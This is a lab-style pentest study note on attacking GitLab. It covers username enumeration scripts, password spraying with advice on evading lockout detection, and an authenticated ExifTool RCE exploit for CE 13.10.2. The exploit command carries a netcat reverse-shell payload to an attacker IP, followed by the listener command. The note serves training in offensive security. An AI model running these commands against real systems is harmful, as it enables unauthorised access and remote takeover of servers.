16.-Attacking-gitlab

1. Username Enumeration

Manual Enumeration

  • Attempt to register accounts with various usernames. GitLab will indicate if a username is already taken, confirming its existence.

Automated Enumeration

  • Use the gitlab_userenum.sh script or its Python3 equivalent to automate the process.

Command Examples

# Bash script version
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Python script version
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

Password Spraying

  • After enumerating usernames, perform password spraying with common passwords or credentials from data breaches.

  • GitLab’s default account lockout policy:

    • 10 failed attempts trigger a 10-minute lockout.

    • Avoid brute-force detection by using slow, distributed attacks.

2. Authenticated Remote Code Execution (RCE)

Vulnerability Details

  • GitLab Community Edition ≤13.10.2 is vulnerable to RCE due to improper handling of ExifTool metadata.

Exploitation Steps

  1. Use the gitlab_13_10_2_rce.py exploit script.

  2. Execute the following command to gain a reverse shell:

Command Example

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

Setting Up a Netcat Listener

  • Start a Netcat listener to receive the reverse shell connection.

Command Example

nc -lnvp 8443

Key Takeaways

Username Enumeration

  • Helps identify valid accounts for potential password spraying.

  • GitLab’s lockout settings must be factored into attack methodology.

RCE Exploitation

  • The ExifTool vulnerability allows remote code execution with valid credentials.

  • If self-registration is enabled, attackers can create an account for exploitation.

Reverse Shell Considerations

  • The RCE exploit initiates a reverse shell to establish persistent access.

Ethical Considerations

  • Only conduct testing on authorized systems.

  • Replace placeholders (IP addresses, ports, credentials) with real values as needed.

Summary of Commands

# Username Enumeration (gitlab_userenum.sh)
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Username Enumeration (gitlab_userenum.py)
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

# Authenticated RCE (gitlab_13_10_2_rce.py)
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

# Netcat Listener
nc -lnvp 8443
Previous15.Gitlab-discovery-and-enumerationNext5. Common Gateway Interfaces

Last updated